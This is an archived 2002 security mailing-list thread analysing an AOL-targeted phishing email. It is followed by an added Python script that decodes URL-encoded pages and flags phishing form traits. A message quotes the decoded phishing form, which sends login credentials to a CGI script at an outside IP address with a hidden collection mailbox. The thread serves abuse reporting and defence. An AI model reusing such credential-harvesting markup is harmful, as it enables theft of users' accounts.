[Dshield] OT?: some stuff, a firewall won't catch

Doug doug at dwhite.ws
Fri Nov 15 22:18:30 GMT 2002


You should forward that stuff to AOL

They will go after them big time!

================================
This address is filtered through the open relay database at
http://www.ordb.org
and is virus scanned by ANTIVIR
http://www.dwhite.ws
mailto:doug at dwhite.ws
================================
----- Original Message -----
From: "Patrick Oonk" <patrick.oonk at pine.nl>
To: <list at dshield.org>
Cc: <abuse at aol.com>; <abuse at verio.net>; <abuse at swbell.net>
Sent: Friday, November 15, 2002 1:34 PM
Subject: Re: [Dshield] OT?: some stuff, a firewall won't catch


| On Fri, Nov 15, 2002 at 11:09:17AM -0500, Bernd Loske wrote:
| > First:
| > It's your own fault, if you really go to the site below and try to log in
| > with your account/password -- you have been warned.
|
| The page is 'encrypted' using URL encoding.
|
| I used the following simple perl script (tnx to
| http://tech-web.net/perl_memo.html)  to decode it.
|
| foreach(<>) {
|   print URLd($_);
| }
|
| sub URLd{
| my $URLdecode=shift;
| $URLdecode=~tr/+/ /;
| $URLdecode=~s/%([a-fA-F0-9]{2})/pack("C",hex($1))/eg;
| return $URLdecode;}
|
| $ perl ud < index.html |more
|
| The most noticeable part is the following:
|
| <form action="http://64.143.44.63/cgi-local/crow.cgi"
| method="POST"name="login">^M
| ^M
| ^M
| <!-- This is the email where they go -->^M
| ^M
| <input type="hidden" name="recipient"
| value="JoshuaKneeland at email.com">^M
| ^M
| <!-- This is the email where they go.. end. -->^M
| ^M
| ^M
| ^M
| <input type="hidden"^M
|     name="subject" value="gp says kristi is god"><input^M
|     type="hidden" name="redirect"^M
|     value="http://love.aol.com/LoveMain/"><input type="hidden"^M
|     name="phish" value><table border="0" cellpadding="2"^M
|     cellspacing="0" align="center">^M
|
| Also notice the CR's to end lines and the fact that parts of
| it are created with Frontpage: the signs of a true loser.
|
| Patrick
|
| >
| > I found the email below in the inbox of my AOL account (yep - still have
| > that) this morning. I usually would have deleted it right away, but I was
| > curious about what these spammers try now, to get your time and money. So --
| > fire up lynx and go to the referenced page -- well -- after getting the
| > source and making it readable, it revealed a nice piece of social
| > engineering. The casual observer might really think, that he logs in to
| > AOL. And in doing so, his/her account/password gets posted to some web
| > server in the process. I wonder how many AOL accounts got compromised? ...
| >
| > How do you catch that, except telling everybody over and over, not to click
| > on links, to trust nobody and that the internet became a bad place to be?
| >
| >
| >
| >
| > -----Original Message-----
| > From: RuffRyderLK at aol.com [mailto:RuffRyderLK at aol.com]
| > Sent: Thursday, November 14, 2002 7:08 PM
| > To: undisclosed-recipients:
| > Subject: You have an admirer!
| >
| >
| > Someone has sent you a secret message. <A
| > HREF=http://members.truepath.com/vegazisfun/>Click here to redeem your
| > message now!</A>
| >
| > _______________________________________________
| > Dshield mailing list
| > Dshield at dshield.org
| > To change your subscription options (or unsubscribe), see: http://www.dshield.org/mailman/listinfo/list
|
| --
|  Patrick Oonk    -   Pine Digital Security    - patrick.oonk at pine.nl
|  T:+31-70-3111010 - F:+31-70-3111011 - Read news at http://security.nl
|  PGPid A4E74BBF  fp A7CF 7611 E8C4 7B79 CA36  0BFD 2CB4 7283 A4E7 4BBF
|                   One thing less to worry about...
|  Excuse of the day: Electricians made popcorn in the power supply
|
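
The decode-and-inspect step described in the quoted message, as an added Python example (not part of the original thread or any poster's code): it undoes the URL encoding the same way the Perl URLd() does, then flags the form traits visible in the decoded page. The sample page, the address 192.0.2.10 and the mailbox are constructed placeholders, and the names FormAudit, is_ip and triage are hypothetical.

```python
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import unquote_plus, urlparse

class FormAudit(HTMLParser):  # collects form actions and hidden inputs
    def __init__(self):
        super().__init__()
        self.actions, self.hidden = [], {}
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.actions.append(a["action"])
        elif tag == "input" and (a.get("type") or "").lower() == "hidden":
            self.hidden[a.get("name") or ""] = a.get("value") or ""

def is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def triage(raw_page):
    """Return (decoded_page, findings) for a percent-encoded page."""
    findings = []
    escapes = len(re.findall(r"%[0-9A-Fa-f]{2}", raw_page))
    if escapes * 3 > len(raw_page) / 2:
        findings.append("obfuscated: over half the body is %XX escapes")
    # '+' -> space and %XX -> byte, as the Perl URLd() in the thread does
    decoded = unquote_plus(raw_page, encoding="latin-1")
    audit = FormAudit()
    audit.feed(decoded)
    hosts = [urlparse(u).hostname or "" for u in audit.actions]
    findings += [f"form posts to bare IP {h}" for h in hosts if is_ip(h)]
    for name, value in audit.hidden.items():
        if re.fullmatch(r"[^@\s]+@[^@\s]+\.[^@\s]+", value):
            findings.append(f"hidden field {name!r} holds mailbox {value}")
        target = urlparse(value).hostname
        if target and target not in hosts:
            findings.append(f"hidden field {name!r} points at {target}")
    return decoded, findings

# Constructed sample page; address and mailbox are placeholders.
SAMPLE_HTML = (
    '<form action="http://192.0.2.10/cgi-local/form.cgi" method="POST">\r\n'
    '<input type="hidden" name="recipient" value="collector@example.invalid">\r\n'
    '<input type="hidden" name="redirect" value="http://www.example.com/"></form>'
)
SAMPLE_RAW = "".join(f"%{b:02X}" for b in SAMPLE_HTML.encode("latin-1"))
print(*triage(SAMPLE_RAW)[1], sep="\n")
```

Run over a saved copy of a suspect page, the findings list gives an abuse desk the posting host and the hidden destination fields without anyone loading the page in a browser.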



